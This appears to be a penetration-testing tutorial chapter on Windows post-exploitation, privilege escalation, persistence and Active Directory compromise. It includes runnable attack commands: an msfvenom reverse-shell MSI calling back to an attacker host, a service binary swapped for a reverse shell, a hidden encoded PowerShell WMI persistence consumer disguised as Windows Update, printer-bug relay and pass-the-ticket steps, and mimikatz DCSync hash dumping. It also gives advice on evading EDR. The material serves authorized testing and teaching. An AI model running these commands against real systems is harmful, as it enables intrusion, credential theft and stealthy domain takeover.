Post-Exploitation, Persistence, and Lateral Movement

Privilege Escalation: From Low to High

Post-exploitation begins with the reality that your initial foothold is rarely sufficient. A low-privilege shell on a Windows workstation demands systematic elevation before any meaningful persistence or lateral movement becomes possible. The MITRE ATT&CK framework catalogs these techniques under Privilege Escalation (TA0004), and Windows environments present a rich attack surface.

WinPEAS (Windows Privilege Escalation Awesome Script) remains the standard starting point for automated enumeration. Its color-coded output demands careful interpretation: red indicates immediate exploitability, yellow signals conditions requiring manual verification, and green denotes standard configurations. When WinPEAS flags Check if you can modify any service registry in red, it typically reveals a service binary hijacking opportunity.

Consider service binary hijacking: when a Windows service references an executable path with weak permissions, an attacker replaces the legitimate binary with a malicious payload. The following commands identify and exploit this condition:

# Identify services with weak permissions
accesschk.exe -uwcqv "Authenticated Users" *

# Verify specific service path is writable
icacls "C:\Program Files\Vulnerable App\Service.exe"

# Replace binary and restart service
copy /Y C:\temp\reverse_shell.exe "C:\Program Files\Vulnerable App\Service.exe"
sc stop VulnService && sc start VulnService

Unquoted service paths create another classic vector. When a service path contains spaces but lacks quotation marks—such as C:\Program Files\Vulnerable App\Service.exe—Windows interprets the path sequentially, attempting execution at each space boundary. An attacker with write access to C:\Program Files\Vulnerable places App.exe there, intercepting execution before reaching the intended binary.

AlwaysInstallElevated represents a registry misconfiguration allowing MSI installation with elevated privileges. When both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated and the corresponding HKCU key equal 1, any user-generated MSI executes as SYSTEM:

# Verify vulnerability exists
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Generate malicious MSI with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f msi -o malicious.msi

# Execute with elevated privileges
msiexec /quiet /qn /i C:\temp\malicious.msi

Token abuse techniques—impersonating or stealing access tokens from privileged processes—complete the common escalation vectors. Tools like Incognito (Metasploit) or direct Windows API calls via TokenImpersonation exploit the reality that processes frequently hold tokens representing higher privilege levels than the current user context.

Persistence: Maintaining Access Under Scrutiny

With elevated privileges, establishing persistence (TA0003) becomes critical. However, modern EDR platforms have rendered many traditional techniques alarmingly visible. Scheduled tasks, registry run keys, and WMI event subscriptions each carry distinct detection profiles.

WMI event subscriptions offer superior stealth against signature-based detection by operating entirely within WMI infrastructure, avoiding filesystem or registry artifacts that EDR monitors aggressively:

# Create WMI event filter for persistence
$FilterArgs = @{
    EventNamespace = 'root/cimv2'
    Name = 'WindowsUpdateFilter'
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
    QueryLanguage = 'WQL'
}

# Bind filter to CommandLineEventConsumer executing payload
$ConsumerArgs = @{
    Name = 'WindowsUpdateConsumer'
    CommandLineTemplate = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -enc <base64_payload>'
}

# Create binding between filter and consumer

Registry-based persistence remains viable when targeting less-scrutinized locations. Beyond HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, consider WinlogonNotify subkeys, ShellServiceObjects, or Explorer\Browser Helper Objects—each offering execution with varying privilege contexts and visibility profiles.

Active Directory Compromise: BloodHound and Attack Path Mapping

The transition from local compromise to domain control requires understanding Active Directory's graph-based trust relationships. BloodHound transforms raw directory data into a Neo4j graph database, revealing attack paths invisible to linear enumeration tools.

SharpHound, the C# ingestor, collects the necessary data from a compromised endpoint:

# Execute SharpHound with all collection methods
.\SharpHound.exe -c All -d contoso.local --zipfilename contoso.zip

# For low-and-slow collection to avoid detection
.\SharpHound.exe -c DCOnly --stealth

Upload the resulting ZIP to BloodHound's interface. The real power emerges through custom Cypher queries and pre-built analytics. The built-in query "Shortest Paths to Domain Admin" reveals minimal-hop routes from the current node to high-value targets. However, sophisticated engagements demand custom exploration.

Critical node types include:

  • User nodes: potential control points when compromised
  • Group nodes: membership transitive relationships
  • Computer nodes: host compromise enabling further access
  • ACL edges: explicit permissions enabling abuse

Worked Example: From Workstation to Domain Compromise

Consider a realistic engagement: initial foothold as CONTOSO\jsmith on workstation WKSTN-42 via phishing payload. The shell operates with standard user privileges.

Phase 1: Local Privilege Escalation

WinPEAS execution reveals an unquoted service path for CustomInventoryService:

╔══════════════════╣ Unquoted Service Paths ╠══════════════════
C:\Program Files\Custom Software\Inventory Agent\service.exe
[...] Permissions: [BUILTIN\Users: W]

The path C:\Program Files\Custom Software is user-writable. We create Inventory.exe that executes our payload, restart the service, and obtain NT AUTHORITY\SYSTEM.

Phase 2: SharpHound Ingestion

With SYSTEM privileges, we execute SharpHound with full collection and exfiltrate the compressed output. BloodHound ingestion reveals the domain graph.

Phase 3: BloodHound Path Analysis

Running "Shortest Paths to Domain Admin" from our compromised WKSTN-42$ computer node reveals:

WKSTN-42 (Computer) → [HasSession] → BACKUP_SVC (User)
BACKUP_SVC → [MemberOf] → Server Operators (Group)
Server Operators → [GenericAll] → DC01 (Computer)
DC01 → [HasSession] → DOMAIN\Administrator

However, a parallel query for unconstrained delegation yields a more efficient path. The WEBSERVER$ account shows unconstrained delegation enabled, and our current user jsmith holds GenericWrite permissions against a web application service account that can authenticate to WEBSERVER$.

Phase 4: Exploitation

We leverage the printer bug (MS-RPRN) to force WEBSERVER$ authentication to our controlled listener, capturing its TGT via unconstrained delegation:

# On Kali, invoke printer bug to trigger authentication
python3 printerbug.py contoso.local/jsmith:[email protected] attacker@80/desired-fake-name

# Simultaneously, capture incoming Kerberos ticket
python3 ntlmrelayx.py -t ldap://dc01.contoso.local --delegate-access --escalate-user 'attacker$'

# Export captured TGT and inject for pass-the-ticket
export KRB5CCNAME=/tmp/administrator.ccache
python3 psexec.py -k -no-pass contoso.local/[email protected]

The captured TGT, due to unconstrained delegation, carries forwardable credentials for any service. We perform pass-the-ticket to authenticate as domain administrator without knowing the password hash.

Phase 5: DCSync and Full Domain Compromise

With administrative access to the domain controller, we execute DCSync to replicate all domain hashes:

# Extract all hashes using mimikatz DCSync
lsadump::dcsync /domain:contoso.local /all /csv

Detection Realities and Tester Methodology

Modern EDR platforms detect most described techniques. Process injection, LSASS access, credential dumping, and anomalous Kerberos traffic generate high-fidelity alerts. This detection capability fundamentally shapes methodology.

For testers, this means:

  • Living-off-the-land binaries (LOLBins) reduce signature detection but behavioral analytics still flag anomalous execution chains
  • EDR blind spots exist in native utilities and expected administrative patterns—understanding normal baseline activity becomes essential
  • Timing and rate considerations: aggressive execution triggers automated response; measured, patient progression mimics legitimate administration

The engagement's value lies not in technique novelty but in demonstrating business impact: from phishing email to domain control, documenting each control failure that enabled progression. BloodHound's visual paths translate technical compromise into executive-understandable risk representation—the unconstrained delegation that permitted ticket capture, the excessive permissions that enabled delegation abuse, the missing EDR coverage that delayed detection.

Effective post-exploitation documentation articulates not merely what was compromised, but what organizational decisions created the pathway, enabling prioritized remediation that genuinely reduces future exposure.